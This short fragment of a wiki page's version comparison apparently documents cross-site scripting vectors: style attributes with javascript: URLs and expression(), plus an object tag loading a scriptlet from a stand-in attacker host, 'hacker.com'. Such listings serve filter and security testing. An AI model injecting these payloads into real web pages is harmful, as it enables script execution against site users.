Versions Compared

Key

  • This line was added.
  • This line was removed.
  • Formatting was changed.

...

No Format
<div style="background-image: url(javascript:alert('XSS'))">
<div style="width: expression(alert('XSS'));">
  • Usage of object with include:
No Format
<object type="text/x-scriptlet" data="http://hacker.com/xss.html">

...